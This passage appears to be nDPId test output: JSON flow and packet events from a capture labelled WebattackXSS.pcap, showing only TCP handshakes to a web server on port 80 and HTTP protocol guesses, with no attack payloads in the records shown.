+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347697189,"flow_last_seen":1499347697189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347697189,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1499347697189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347697189,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88ppAAD4G0zWsEAABwKgKMuo4AFBV\/kLMAAAAAKACchAqHwAAAgQFtAQCCAoBO7BWAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":2,"flow_last_seen":1499347697189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347697189,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6jj3l3auVf5CzaAScSA3CAAAAgQFtAQCCAoD5YHKATuwVgEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6105,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":3,"flow_last_seen":1499347697190,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347697190,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08ptAAD4G0zysEAABwKgKMuo4AFBV\/kLN95d2r4AQAOXWDwAAAQEICgE7sFYD5YHK"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347698449,"flow_last_seen":1499347698449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698449,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1499347698449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347698449,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iq9AAD4GOyGsEAABwKgKMupGAFDXwDs\/AAAAAKACchCuoQAAAgQFtAQCCAoBO7GQAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":2,"flow_last_seen":1499347698449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347698449,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6kYJky3T18A7QKAScSDxLwAAAgQFtAQCCAoD5YMFATuxkAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":3,"flow_last_seen":1499347698449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347698449,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0irBAAD4GOyisEAABwKgKMupGAFDXwDtACZMt1IAQAOWQNgAAAQEICgE7sZED5YMF"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347564211,"flow_last_seen":1499347569770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347564211,"flow_last_seen":1499347569770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347565457,"flow_last_seen":1499347570771,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58550,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347565457,"flow_last_seen":1499347570771,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347566719,"flow_last_seen":1499347571771,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58564,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347566719,"flow_last_seen":1499347571771,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347569321,"flow_last_seen":1499347574772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347569321,"flow_last_seen":1499347574772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347570571,"flow_last_seen":1499347575772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347570571,"flow_last_seen":1499347575772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347573065,"flow_last_seen":1499347578774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347573065,"flow_last_seen":1499347578774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347699724,"flow_last_seen":1499347699724,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347699724,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1499347699724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347699724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U2NAAD4Gcm2sEAABwKgKMupUAFDv6uGsAAAAAKACchDuvAAAAgQFtAQCCAoBO7LPAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6128,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":2,"flow_last_seen":1499347699724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347699724,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6lS1E1w77+rhraAScSBWIwAAAgQFtAQCCAoD5YREATuyzwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":3,"flow_last_seen":1499347699724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347699724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U2RAAD4GcnSsEAABwKgKMupUAFDv6uGttRNcPIAQAOX1KgAAAQEICgE7ss8D5YRE"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347702287,"flow_last_seen":1499347702287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347702287,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1499347702287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347702287,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dHpAAD4GUVasEAABwKgKMupuAFBhicEqAAAAAKACchCbBQAAAgQFtAQCCAoBO7VQAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":2,"flow_last_seen":1499347702287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347702287,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6m4\/xiwDYYnBK6AScSClcAAAAgQFtAQCCAoD5YbFATu1UAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6147,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":3,"flow_last_seen":1499347702288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347702288,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dHtAAD4GUV2sEAABwKgKMupuAFBhicErP8YsBIAQAOVEeAAAAQEICgE7tVAD5YbF"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347703726,"flow_last_seen":1499347703726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347703726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1499347703726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347703726,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80EJAAD4G9Y2sEAABwKgKMup8AFAHaGb6AAAAAKACchBN4QAAAgQFtAQCCAoBO7a4AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6158,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":2,"flow_last_seen":1499347703726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347703726,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6nwCGRKtB2hm+6AScSCt5wAAAgQFtAQCCAoD5YgtATu2uAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6159,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":3,"flow_last_seen":1499347703727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347703727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00ENAAD4G9ZSsEAABwKgKMup8AFAHaGb7AhkSroAQAOVM7wAAAQEICgE7trgD5Ygt"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347705116,"flow_last_seen":1499347705116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347705116,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1499347705116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347705116,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oq5AAD4GIyKsEAABwKgKMuqKAFDjSRq9AAAAAKACchC80wAAAgQFtAQCCAoBO7gTAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":2,"flow_last_seen":1499347705116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347705116,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6oqWCrpo40kavqAScSDf0QAAAgQFtAQCCAoD5YmIATu4EwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6174,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":3,"flow_last_seen":1499347705116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347705116,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oq9AAD4GIymsEAABwKgKMuqKAFDjSRq+lgq6aYAQAOV+2QAAAQEICgE7uBMD5YmI"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347706399,"flow_last_seen":1499347706399,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347706399,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1499347706399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347706399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8F3NAAD4Grl2sEAABwKgKMuqYAFBMGa4nAAAAAKACchC\/SgAAAgQFtAQCCAoBO7lUAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":2,"flow_last_seen":1499347706399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347706399,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6pjZqykETBmuKKAScSAuywAAAgQFtAQCCAoD5YrJATu5VAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6183,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":3,"flow_last_seen":1499347706400,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347706400,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0F3RAAD4GrmSsEAABwKgKMuqYAFBMGa4o2aspBYAQAOXN0gAAAQEICgE7uVQD5YrJ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347709252,"flow_last_seen":1499347709252,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709252,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60084,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1499347709252,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347709252,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8u61AAD4GCiOsEAABwKgKMuq0AFAeNwewAAAAAKACchCQvwAAAgQFtAQCCAoBO7wdAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6203,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":2,"flow_last_seen":1499347709253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347709253,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6rSwITsWHjcHsaAScSAU7wAAAgQFtAQCCAoD5Y2SATu8HQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":3,"flow_last_seen":1499347709253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347709253,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0u65AAD4GCiqsEAABwKgKMuq0AFAeNwexsCE7F4AQAOWz9QAAAQEICgE7vB4D5Y2S"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347574366,"flow_last_seen":1499347579775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58650,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347574366,"flow_last_seen":1499347579775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347575652,"flow_last_seen":1499347580775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 